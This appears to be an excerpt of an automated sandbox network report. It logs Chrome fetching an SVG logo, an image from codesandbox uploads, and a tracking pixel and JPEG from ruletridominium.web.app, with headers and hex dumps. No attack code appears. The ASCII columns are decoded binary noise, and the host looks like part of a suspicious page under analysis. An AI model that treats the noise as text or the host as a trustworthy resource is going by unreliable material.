                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 45 62 65 6e 65 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 22 20 79 3d 22 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 38 34 20 31 32 30 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 3c 73 74 79 6c 65 3e 2e 73 74 30 7b 66 69 6c 6c 3a 23 30 30 33 34 37 32 7d 3c 2f 73 74 79 6c 65 3e 3c 70 61 74 68 20 69 64 3d 22 43 68 72 69 73 74 69 61 6e 5f 31 5f 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 31 31 34 2e 33 20 33 39 2e 39 68 35 2e 32 76 31 37 68 2d 35 2e 33 56 34 33 2e 38 68 2d 36 2e 39 56 35 30 63 30 20 32 2e 31 2e 35 20 33 20 32 2e 31 20 33 20 2e 37 20 30 20 31 2e 32
                                                                                                                                                                                                                                                                                Data Ascii: <svg version="1.1" id="Ebene_1" xmlns="http://www.w3.org/2000/svg" x="0" y="0" viewBox="0 0 184 120" xml:space="preserve"><style>.st0{fill:#003472}</style><path id="Christian_1_" class="st0" d="M114.3 39.9h5.2v17h-5.3V43.8h-6.9V50c0 2.1.5 3 2.1 3 .7 0 1.2
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 31 2e 31 20 31 2e 34 2d 32 2e 39 20 32 2e 31 2d 34 2e 39 20 32 2e 31 2d 33 2e 35 20 30 2d 35 2e 35 2d 32 2e 35 2d 35 2e 35 2d 35 2e 32 20 30 2d 34 2e 34 20 33 2e 39 2d 36 2e 35 20 31 30 2d 36 2e 35 76 2d 2e 32 63 30 2d 2e 39 2d 2e 35 2d 32 2e 32 2d 33 2e 31 2d 32 2e 32 2d 31 2e 37 20 30 2d 33 2e 36 2e 36 2d 34 2e 37 20 31 2e 33 6c 2d 31 2d 33 2e 34 63 31 2e 32 2d 2e 37 20 33 2e 35 2d 31 2e 35 20 36 2e 36 2d 31 2e 35 20 35 2e 37 20 30 20 37 2e 34 20 33 2e 34 20 37 2e 34 20 37 2e 34 76 35 2e 39 63 30 20 31 2e 36 2e 31 20 33 2e 32 2e 33 20 34 2e 31 6c 2d 34 2e 37 2d 2e 31 7a 6d 38 2e 37 2d 31 31 2e 35 63 30 2d 32 2e 31 2d 2e 31 2d 33 2e 39 2d 2e 32 2d 35 2e 35 68 34 2e 36 6c 2e 33 20 32 2e 34 68 2e 31 63 2e 37 2d 31 2e 31 20 32 2e 34 2d 32 2e 38 20 35 2e 32
                                                                                                                                                                                                                                                                                Data Ascii: 1.1 1.4-2.9 2.1-4.9 2.1-3.5 0-5.5-2.5-5.5-5.2 0-4.4 3.9-6.5 10-6.5v-.2c0-.9-.5-2.2-3.1-2.2-1.7 0-3.6.6-4.7 1.3l-1-3.4c1.2-.7 3.5-1.5 6.6-1.5 5.7 0 7.4 3.4 7.4 7.4v5.9c0 1.6.1 3.2.3 4.1l-4.7-.1zm8.7-11.5c0-2.1-.1-3.9-.2-5.5h4.6l.3 2.4h.1c.7-1.1 2.4-2.8 5.2
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC881INData Raw: 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 64 33 37 62 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 39 64 30 30 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 70 61 74 68 20 69 64 3d 22 53 68 61 70 65 5f 31 5f 22 20 64 3d 22 4d 38 36 2e 31 20 38 37 2e 33 63 2d 2e 39 2d 32 2e 34 2d 32 2e 33 2d 34 2e 36 2d 33 2e 39 2d 36 2e 36 2d 31 2e 32 2d 31 2e 36 2d 32 2e 36 2d 33 2d 34 2e 33 2d 34 2e 31 2d 2e 33 2d 2e 32 2d 2e 36 2d 2e 33 2d 2e 39 2d 2e 31 2d 34 2e 33 20 32 2e 35 2d 38 2e 37 20 34 2e 36 2d 31 33 2e 34 20 36 2e 33 2d 33 2e 33 20 31 2e 32 2d 36 2e 38 20 32 2e 32 2d 31 30 2e 34 20 32 2e 35 2d 32 2e 39 2e 33 2d 35 2e 37 2e 31 2d 38 2e 36
                                                                                                                                                                                                                                                                                Data Ascii: op offset="0" stop-color="#ffd37b"/><stop offset="1" stop-color="#ff9d00"/></linearGradient><path id="Shape_1_" d="M86.1 87.3c-.9-2.4-2.3-4.6-3.9-6.6-1.2-1.6-2.6-3-4.3-4.1-.3-.2-.6-.3-.9-.1-4.3 2.5-8.7 4.6-13.4 6.3-3.3 1.2-6.8 2.2-10.4 2.5-2.9.3-5.7.1-8.6


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                56192.168.2.649786104.18.43.94433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC503OUTGET /uploads/user/cb07091a-9803-4eab-aa81-fd133653f44b/fjLo-hhcap.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: uploads.codesandbox.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: _cfuvid=._XNCH1d1zLfrUiFyS3nncmcFBwSXAaSjcbhUhvZEtw-1728225714517-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Content-Length: 24296
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                                                                Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                                                                Cf-Polished: origSize=50935
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-expose-headers: Content-Type
                                                                                                                                                                                                                                                                                etag: "5515ae63a3e02bc196798380e50db72f"
                                                                                                                                                                                                                                                                                expires: Sun, 06 Oct 2024 15:04:35 GMT
                                                                                                                                                                                                                                                                                last-modified: Fri, 12 Aug 2022 09:41:54 GMT
                                                                                                                                                                                                                                                                                x-goog-generation: 1660297314302637
                                                                                                                                                                                                                                                                                x-goog-hash: crc32c=OXqjWA==
                                                                                                                                                                                                                                                                                x-goog-hash: md5=VRWuY6PgK8GWeYOA5Q23Lw==
                                                                                                                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                x-goog-storage-class: REGIONAL
                                                                                                                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                                x-goog-stored-content-length: 50935
                                                                                                                                                                                                                                                                                x-guploader-uploadid: ABPtcPp2fhPCGNIpcQlwaY2Oh19QvVEbZFwXcHB2slG-vKQEDnXXgaFBhs9kyVN8uVVomh0rOLytQI6QxQ
                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                Age: 2243
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8ce66a576aafc44d-EWR
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC493INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a6 00 00 00 b6 08 02 00 00 00 84 50 d8 7a 00 00 0c 56 69 43 43 50 69 63 63 00 00 78 da ad 97 77 58 d3 d7 f7 c7 cf 67 24 21 81 b0 41 40 46 d8 4b 10 d9 43 46 08 2b 80 ec 21 88 4a 48 02 84 11 63 48 50 71 8f 52 05 eb 16 51 9c 68 55 c4 a2 d5 0a 48 1d 88 5a b5 52 04 b7 75 14 b5 a8 54 6a 51 8b 0b 95 df 85 04 f4 67 fb fd e3 fb 3c df f3 3c f7 73 5f cf fb 9e 7b ee 39 e7 26 cf e7 f9 00 68 bc e1 49 24 05 b8 26 40 a1 58 26 4d 08 0f 66 4d 4c 4b 67 d1 1e 01 15 46 83 26 98 83 19 8f 5f 24 61 c7 c5 45 03 32 c5 fc a5 bd ba 0e 18 20 bb e2 34 18 0b fe 3b d3 16 08 8b f8 00 58 06 e2 2c 41 11 bf 10 71 33 00 b9 99 2f 91 ca 00 a8 83 ba e5 0c 99 64 90 17 20 d6 95 a2 04 11 af 1b e4 1c 05 ef 1d e4 2c 05 1f 1b f2 49 4a e0 20 6e
                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDRPzViCCPiccxwXg$!A@FKCF+!JHcHPqRQhUHZRuTjQg<<s_{9&hI$&@X&MfMLKgF&_$aE2 4;X,Aq3/d ,IJ n
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: 11 5b 21 4e 10 8a c3 83 15 f1 89 e2 6c 69 58 82 d2 bf ac b0 68 b8 5e 62 7b ae 88 1b a3 e4 43 b2 dc a4 08 45 7f 88 33 7c de 50 fe 06 88 db 85 62 76 f2 70 1c 61 d1 c4 e8 e1 5a 04 c2 90 50 45 ed c4 13 a1 38 39 51 19 e7 8d 44 16 9c a0 d8 4b 32 24 05 71 4a 7f d2 42 58 10 3e a8 5b 20 76 2f 2a 4e 54 ee 25 53 64 d2 24 e5 1d 91 d9 12 59 5c 92 22 4f b2 24 8f 17 19 a7 c8 87 5c 05 d1 c0 81 10 60 81 1c 8d 2c 98 06 79 20 6a eb 69 e8 01 96 72 25 0c 78 20 85 1c 10 82 93 42 19 d9 91 3a b4 22 46 cf 44 28 81 3f 11 09 a1 68 64 5f f0 d0 aa 10 8a 91 fe 61 58 55 3e 9d 20 7b 68 b5 78 68 47 3e 3c 42 5c 08 51 50 00 42 90 0f ed 12 8f 9c 96 02 bf 23 45 f4 8f d3 79 68 f0 51 be 05 68 a0 f5 7f d7 95 ea e7 0a 1b 29 d1 4a 45 3e 7c 22 4b 63 d8 93 1a 4a 0d a1 46 50 c3 a8 f6 a4 11 19 40 fa
                                                                                                                                                                                                                                                                                Data Ascii: [!NliXh^b{CE3|PbvpaZPE89QDK2$qJBX>[ v/*NT%Sd$Y\"O$\`,y jir%x B:"FD(?hd_aXU> {hxhG><B\QPB#EyhQh)JE>|"KcJFP@
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: bf c5 be dd 01 77 f0 70 c8 75 a8 72 b8 e4 88 3b 7a 3a 8a 1c b7 38 76 8c a1 8c f1 19 23 1e 53 3d e6 86 93 9a 13 db a9 d8 a9 d6 e9 be b3 be 73 b4 f3 22 e7 06 e7 67 63 ad c6 a6 8f 5d 3d f6 dc d8 8f 2e 1e 2e 05 2e bb 5c 6e 8f d3 1e 17 39 6e d1 b8 a6 71 2f 5c 1d 5c f9 ae 55 ae 57 dd 98 6e 61 6e f3 dd 1a dd 9e bb 3b ba 0b dd b7 ba df f4 d0 f1 98 e0 f1 b5 47 8b c7 07 4f 2f 4f a9 67 9d 67 b7 97 95 57 a6 d7 66 af 1b de ba de 71 de cb bd cf fb 50 7c 82 7d e6 fb 1c f3 79 eb eb e9 2b f3 3d e4 fb 97 9f 93 5f be df 3e bf 27 e3 6d c7 0b c7 ef 1a ff d0 df c2 9f e7 bf c3 bf 33 80 15 90 19 b0 3d a0 33 d0 3c 90 17 58 1d f8 20 c8 32 48 10 b4 3b e8 31 db 9e 9d c7 de cf 7e 16 ec 12 2c 0d 3e 12 fc 9a e3 cb 99 cb 69 0e 21 42 c2 43 ca 42 da 42 b5 43 93 43 37 85 de 0b b3 08 cb 09
                                                                                                                                                                                                                                                                                Data Ascii: wpur;z:8v#S=s"gc]=...\n9nq/\\UWnan;GO/OggWfqP|}y+=_>'m3=3<X 2H;1~,>i!BCBBCC7
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: 4c 52 63 e9 f3 6a b1 13 6c 0f 64 d5 43 5b 0e ef 48 15 30 33 3c 23 a5 07 ec 16 13 3a 1c ca 51 da 37 e8 d0 ad ad 6e 19 7c 7c 7c 7c 7c 7c fc 1e 7c 67 64 73 d7 4e af d0 6a 24 84 8f 8f 8f 8f 8f 8f df 83 ef 4e 8e ca dc 72 c9 86 1a 07 99 36 7c 7c 7c 7c 7c 7c fc 1e 7c d7 70 54 47 b4 34 4c 99 69 db 19 1f 1f 1f 1f 1f 1f bf 07 df e5 ea 7e 80 4e 9a ce f3 cb c9 9a 76 12 3e 3e 3e 3e 3e 3e 7e 0f be cb 1b 33 c1 86 c5 cb ee 5d 03 3e 3e 3e 3e 3e 3e 7e 0f be d3 b1 f3 7c 45 87 ec 52 cf 96 9a 16 1d 29 e1 e3 e3 e3 e3 e3 e3 f7 e0 bb dd fb 6f 85 af 85 6a df 18 f8 f8 f8 f8 f8 f8 f8 3d f8 ee 1d 2f ad 25 7d 61 9e 4e cd f8 f8 f8 f8 f8 f8 f8 3d f8 4e f5 49 95 74 d3 7a d3 ae 05 1f 1f 1f 1f 1f 1f bf 07 df 95 76 b5 06 a8 9c eb b4 2d 96 03 3e 3e 3e 3e 3e 3e 7e 0f be cb 9b b6 68 c7 96 b0
                                                                                                                                                                                                                                                                                Data Ascii: LRcjldC[H03<#:Q7n|||||||gdsNj$Nr6|||||||pTG4Li~Nv>>>>>>~3]>>>>>>~|ER)oj=/%}aN=NItzv->>>>>>~h
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: 08 1b a4 eb 25 88 01 21 74 f2 88 a5 84 c9 b9 48 b6 c6 1f 7f fc f1 c7 1f ff e7 fb c7 32 f0 bb fd f7 ed 2f 9e 77 a1 87 14 f0 0c 04 74 d7 af a9 d7 6f 10 99 7d 98 d6 a5 34 48 c4 7b 5f 09 e8 12 41 c1 f9 3b 39 b6 47 64 fc f1 c7 1f 7f fc f1 7f 1d 3f 40 be dd 7f df fe 82 7a 08 3e 70 9f 04 24 37 23 dc a9 e3 d3 a3 48 1f 62 2b 18 08 62 d8 3a e5 b8 7e 2e 2e 51 28 7e fc 65 80 60 c7 6f fc f1 c7 1f 7f fc f1 7f bc af dd 22 7c bb ff be fd df 40 05 02 0d 8c 4b 48 dc ea 85 de e3 56 2e 11 89 2a 44 a0 3b 0c 4c 60 8b 6e d0 b3 96 42 32 42 08 84 80 8c 44 c8 22 ae bf 5c d2 f8 e3 8f 3f fe f8 3f ca ff df ff ff 58 4a 9d b3 c0 c0 3f fe fa f3 5c bf be 48 71 c6 d3 ff fd 5f ff 26 38 c1 3e fe 7f ff f3 fb 2f f7 fd c0 c3 f7 cb fd f7 ed af c7 05 01 7b 12 c1 11 82 7b f2 d8 10 50 0f 2b 44 a8
                                                                                                                                                                                                                                                                                Data Ascii: %!tH2/wto}4H{_A;9Gd?@z>p$7#Hb+b:~..Q(~e`o"|@KHV.*D;L`nB2BD"\??XJ?\Hq_&8>/{{P+D
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: 38 7f 97 7e c9 c4 b6 79 c2 78 62 5b d7 18 98 26 04 58 d4 69 2b c0 44 02 01 c9 e8 8b a0 a9 13 93 10 a2 38 30 22 60 30 06 d7 ab 4c 46 9f ee 77 bf fb dd ef fe 16 fa 24 a3 5f 47 3f 8a 41 69 7e 58 f8 0c 3e 86 3a f7 63 58 d6 0f e7 4e 7f 60 f0 37 9d bf 4b bf 20 e0 7c 4d da 94 69 80 c6 80 30 bb a1 02 a0 d3 a8 18 20 48 c6 f9 26 23 5e 00 9c 7c 11 49 10 44 21 24 49 02 46 15 08 1a c0 10 2b 26 a4 74 bf fb dd ef 7e f7 b7 ca af 83 9f e6 67 e1 d3 7c 18 fd 88 62 20 ff ea f2 23 37 fd e4 3b 7f e6 0d fb 65 f2 05 42 51 96 f5 93 b8 ed fd 71 91 8f 9b cd df a5 5f 08 4e a4 b3 87 46 32 1b 90 4c bc 02 24 01 30 a1 4d cc 78 52 cd 60 56 82 20 d8 7e 67 6d 91 21 10 13 c0 8a 52 25 92 14 00 4b 24 00 12 0a a2 dd ef 7e f7 bb df fd b3 ee 6b f3 33 f8 34 df e7 f3 b5 f9 e1 03 87 0e bf f9 95 17
                                                                                                                                                                                                                                                                                Data Ascii: 8~yxb[&Xi+D80"`0LFw$_G?Ai~X>:cXN`7K |Mi0 H&#^|ID!$IF+&t~g|b #7;eBQq_NF2L$0MxR`V ~gm!R%K$~k34
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: 78 f1 ce 07 af 3c b2 96 2f 37 7d f5 c4 cd f7 ec 8d 3e f7 3d fe 04 06 0c d6 14 b4 88 e1 7c cf 2b 46 2b 09 21 a2 92 70 c9 59 ee ff 32 1f 37 9d bf 4b bf 00 02 04 c9 a4 3b 8d 2d de 31 48 9b 9c c5 dd 08 18 46 d5 c1 92 42 35 20 20 a9 8a 86 0a a8 0e a6 0e be a6 90 00 84 8a 14 40 49 0d cd 97 4a 62 ed 7e f7 bb df fd ee 6f da 67 f0 31 21 41 08 8e 3e c4 75 9f b8 96 2f 37 dd b3 97 aa 48 f8 b7 ef 3c f2 d6 d7 ee 4c 2e ac f2 fe c4 4d f7 9e b8 f6 e0 25 bf fc ce 23 6b f9 72 f3 b1 13 37 df 7d 02 0c 5c 77 e8 c0 ad d7 bc eb d6 f7 be fb f2 d7 5d 28 48 49 6d 7b 8f 7e 04 44 21 81 2d e8 bf 59 cb c7 4d e7 ef d2 2f 40 00 25 b4 23 91 f1 68 20 f3 2d 5c de 35 60 da 68 44 02 58 49 ab 7a f0 33 5d 0d 17 99 dc 28 75 30 42 2b 3b 62 9b 49 d4 74 bf fb dd ef 7e f7 37 ef 03 88 44 a8 f0 fc fe
                                                                                                                                                                                                                                                                                Data Ascii: x</7}>=|+F+!pY27K;-1HFB5 @IJb~og1!A>u/7H<L.M%#kr7}\w](HIm{~D!-YM/@%#h -\5`hDXIz3](u0B+;bIt~7D
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: ee f3 c2 fc b7 fd d8 0e 20 f9 81 e4 cb dd 0f 9d fa 85 db ee fc ca 83 a7 de 7f 64 f7 df 5d 75 c5 db 5e bf 43 00 a4 d5 1f 40 94 0c f5 1b 20 48 81 6c 53 ff 9d e5 e3 86 f3 77 e9 97 b9 33 5d 4d 55 1a 60 b1 55 68 d7 06 10 81 86 e1 a8 05 c1 08 32 ed a7 49 0c 68 b0 15 54 a1 f9 01 67 7f a5 3f 26 ad 25 c4 40 02 49 f7 bb df fd ee 77 ff 65 f7 79 4e ff 2b 7f f8 08 10 78 e9 f9 f2 e5 87 4e fe 8b db ee f8 ca 1f 9e fc f7 57 1d 59 7d 44 00 5a be dc f3 e0 49 82 2f b4 7e cf 7e ff 01 ca 2c 1f 37 9c bf 4b bf 00 ea e8 38 aa 41 40 c8 34 34 e9 8d 68 66 c6 d5 53 51 69 d3 34 02 05 34 95 00 25 83 5f 84 8a 06 c0 42 98 8a a9 21 c4 40 0c 89 15 aa a0 21 09 06 30 58 6b f7 bb df fd ee 77 ff e5 f2 19 7d 4e eb 03 f0 12 f3 65 f5 ce fd ea f5 fc b7 bf fe a2 1b ae fa f1 cb 5f b7 83 2d 5f 7e e1
                                                                                                                                                                                                                                                                                Data Ascii: d]u^C@ HlSw3]MU`Uh2IhTg?&%@IweyN+xNWY}DZI/~~,7K8A@44hfSQi44%_B!@!0Xkw}Ne_-_~
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: da 37 bf f2 af 5c b8 fd f5 77 bf fb dd ef fe 0b f5 83 22 93 1f 40 4b 4c 04 6a 9a cf 5d df 3e f5 cf 3e 71 c7 8d 9f df 7b e1 f9 b2 7a e7 fe bf 7e 7e af 42 15 d6 ea 17 5a fd b4 fa 85 4a 39 43 fd 6e 43 ff 13 67 f9 b8 e9 fc 5d fa fb 80 79 c9 4e 03 32 5e 2a 33 0d 18 06 da 30 c3 1c 21 e2 b8 65 5b 9a 88 20 29 08 b1 9a 50 23 2a 29 44 00 8d 10 0a 0a 25 08 44 d4 00 d4 d1 07 02 42 38 cb fe a9 ff 7f 72 f5 fe fd 2a f2 2b cf 00 91 24 af bd e0 35 ef 7a d3 4f ff ad 03 3f 75 fe 8f 9c bf e5 f5 6f 89 ff e8 e3 8f 7d f2 93 9f 14 fe fe 7b ae 7a ed eb 2e 3e e7 ea ef 7e f7 ff 72 fb d7 bf 63 bf 53 62 89 a3 70 ec db 4f a0 24 80 21 62 0c d9 3d bf c5 d7 ef dc fb f0 ab ce fb 91 7f 70 c5 5f 3b 73 be dc 75 ff c9 5f fd dc f1 bb be 75 b2 f9 f0 37 7e f4 02 14 02 48 f3 2f cc 79 3a 7a 05 1d
                                                                                                                                                                                                                                                                                Data Ascii: 7\w"@KLj]>>q{z~~BZJ9CnCg]yN2^*30!e[ )P#*)D%DB8r*+$5zO?uo}{z.>~rcSbpO$!b=p_;su_u7~H/y:z
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1369INData Raw: bf 3d c8 df 4f a7 d3 23 37 46 1e 3d 2c ce bf 9b 97 fe 26 3b 66 f8 93 44 1c c6 f1 f5 57 65 7f 46 e6 9d 8a 02 96 66 5a 13 35 9c 47 53 e6 45 33 d4 b6 42 31 b1 10 e4 d4 17 f6 42 97 cb a6 e2 44 51 3c 40 81 86 4e 26 34 e1 d4 37 ce 5e d4 02 54 3a e7 7a 7e f7 cb f3 3a d8 b4 17 39 d9 f8 f9 f8 dc f3 fc 78 7e 9f 7d 79 ee c6 c3 c8 a1 7f 79 79 b9 df dc 4f 51 ad d5 d5 0f da da da 6c 36 9b cf ef 97 dd df d3 d3 d3 ce 4e 10 d2 b5 15 d9 02 0d 0b 0b f3 7d a6 de 27 8f eb 81 6f 7c 69 f4 b2 9e bc 7b fe 0b fc 02 3f 9b 2f 00 91 c3 1e 9f cf f5 f9 8f 5e c3 7c 21 03 d4 d5 f4 0b 68 70 32 fd 32 3e 9e 64 37 b8 ff b7 64 f3 f1 ba e6 2f e6 e3 3c 7b 9d e5 4c ce ce a4 99 b8 29 56 49 8b 25 a5 1c 97 e0 38 ee 17 0f 7f 78 f1 7c 06 3c 64 78 65 c4 00 22 1e fd 9f 1b 38 bc 79 51 25 64 3c ba f2 28
                                                                                                                                                                                                                                                                                Data Ascii: =O#7F=,&;fDWeFfZ5GSE3B1BDQ<@N&47^T:z~:9x~}yyyOQl6N}'o|i{?/^|!hp22>d7d/<{L)VI%8x|<dxe"8yQ%d<(


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                57192.168.2.649790199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC353OUTGET /tp.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 67
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Etag: "a860664afe73299c9d64214119a53a87b09e5d7b7ec8da64e55a07cd8ced3554"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740043-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.928621,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC67INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 00 00 00 00 3a 7e 9b 55 00 00 00 0a 49 44 41 54 18 57 63 f8 0f 00 01 01 01 00 5a 4d 6f f1 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR:~UIDATWcZMoIENDB`


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                58192.168.2.649788199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC383OUTGET /c38b46548211dc0a01b864de5360ff89.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC593INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 68087
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                Etag: "470947f9129dff27c0598db82dba5db6d82dcc647d53eaeeb2e1b66a9663eec1"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.947097,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
